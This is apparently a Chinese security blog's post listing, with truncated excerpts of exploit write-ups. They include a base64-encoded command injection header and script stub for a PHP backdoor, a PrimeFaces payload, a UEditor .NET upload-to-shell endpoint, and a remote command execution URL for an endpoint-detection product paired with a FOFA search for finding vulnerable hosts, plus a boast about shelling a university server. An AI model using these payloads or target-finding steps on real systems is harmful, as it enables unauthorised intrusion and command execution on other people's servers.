去B站咯
摘要: Accept-Encoding: gzip,deflate Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs= 地址 脚本如下: import base64,requests,queue,sys payload = "system('"+sys.argv[2]+"');" 阅读全文
posted @ 2020-12-11 16:25 不想长大a 阅读(202) 评论(0) 推荐(0) 编辑
摘要: exp payload pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC 阅读全文
posted @ 2020-11-25 15:10 不想长大a 阅读(1250) 评论(0) 推荐(0) 编辑
摘要: 漏洞存在点: http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 漏洞原因:controller.ashx文件下只校验ContentType而没校验文件后缀导致getshell。 payload如下, 阅读全文
posted @ 2020-11-17 11:45 不想长大a 阅读(4014) 评论(0) 推荐(0) 编辑
摘要: 最近在写exp,需要识别远程主机操作系统。 通常判断远程主机操作系统,有以下几种方式: 大小写判断 ttl值判断 扫描器扫描 由于不清楚目标链接是否存在某个文件或者目录,因此使用大小写来判断操作系统,也并非良策。 ttl值可以自定义,因此也不太好判断是否正确。 因此就想到了调用扫描器的扫描结果,来判 阅读全文
posted @ 2020-10-10 09:39 不想长大a 阅读(1168) 评论(0) 推荐(0) 编辑
摘要: 先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令 使用whoami查询当前用户权限 使用pwd查询当前所在目录 查看当 阅读全文
posted @ 2020-09-30 14:53 不想长大a 阅读(556) 评论(0) 推荐(0) 编辑
摘要: 第一次拿别人家大学服务器的shell,因此就将思路整理了一下,投稿到了freebuf。 链接点这 ps:因为投稿的时间恰好在hw期间,因此稿件太过于敏感,就被删了。 阅读全文
posted @ 2020-09-06 13:06 不想长大a 阅读(472) 评论(0) 推荐(0) 编辑
摘要: 不定时更新插件。 插件可以在谷歌商店和火狐商店下载。 SimpleExtManager 管理浏览器插件的一款插件 Wappalyzer 分析网站应用程序的一款插件 User Agent Switcher 切换浏览器的头部的一款插件 FOFA Pro view 简易版的FOFA搜索引擎,可查C段,端口 阅读全文
posted @ 2020-09-05 21:00 不想长大a 阅读(297) 评论(0) 推荐(0) 编辑
摘要: 首先是下载nessus nessus下载 然后申请免费的激活码 申请激活码 邮箱填一个能接收验证码的就写,其他随便 收到邮箱后 管理员打开命令行,cd到nessus的安装目录 创建nessus的管理用户 nessuscli.exe adduser admin 获取Challenge code nes 阅读全文
posted @ 2020-08-06 12:59 不想长大a 阅读(1038) 评论(0) 推荐(0) 编辑
摘要: 1.找到nessus的安装路径 即nessuscli.exe所在的目录,复制该路径 2.管理员启动cmd(如果直接在搜索栏输入cmd打开命令提示符,可能会提示没有权限) 3.按照截图操作 阅读全文
posted @ 2020-07-21 10:34 不想长大a 阅读(1438) 评论(0) 推荐(0) 编辑
摘要: https://www.kuaidaili.com/free/ 代码如下: import requests from bs4 import BeautifulSoup # 获取网站数据 def get_data(url): headers = { 'user-agent': 'Mozilla/5.0 阅读全文
posted @ 2020-07-11 15:56 不想长大a 阅读(529) 评论(0) 推荐(0) 编辑